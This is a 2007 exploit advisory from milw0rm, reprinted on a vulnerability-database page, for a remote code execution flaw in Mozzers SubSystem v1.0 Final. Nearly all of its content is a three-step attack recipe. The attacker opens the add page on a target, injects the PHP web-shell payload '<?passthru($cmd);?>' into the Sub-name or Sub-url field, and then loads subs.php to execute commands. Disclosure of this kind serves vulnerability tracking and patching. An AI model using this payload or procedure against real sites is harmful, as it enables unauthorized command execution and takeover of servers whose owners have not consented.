Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16771
HistoryApr 19, 2007 - 12:00 a.m.

Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability

2007-04-1900:00:00
vulners.com
38

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •                                           Y! Underground Group                                               +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •      Portal......:  Mozzers SubSystem v1.0 Final                                                             +
    
  •      Author......:  Dj7xpl / [email protected]                                                                +
    
  •      Type........:  Remote Code Execution Vulnerability                                                      +
    
  •      Download....:  http://sourceforge.net/projects/subsystem/                                               +
    
  •      Page........:  http://Dj7xpl.2600.ir                                                                    +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •      Bug.........:                                                                                           +
    
  •                     (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add                   +
    
  •                     (2) Insert Bad Code Into (Sub-name) Or (Sub-url)  E.g  :<?passthru($cmd);?>              +
    
  •                     (3) See Your Bad Code      : http://[Target]/[Path]/subs.php                             +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

milw0rm.com [2007-04-18]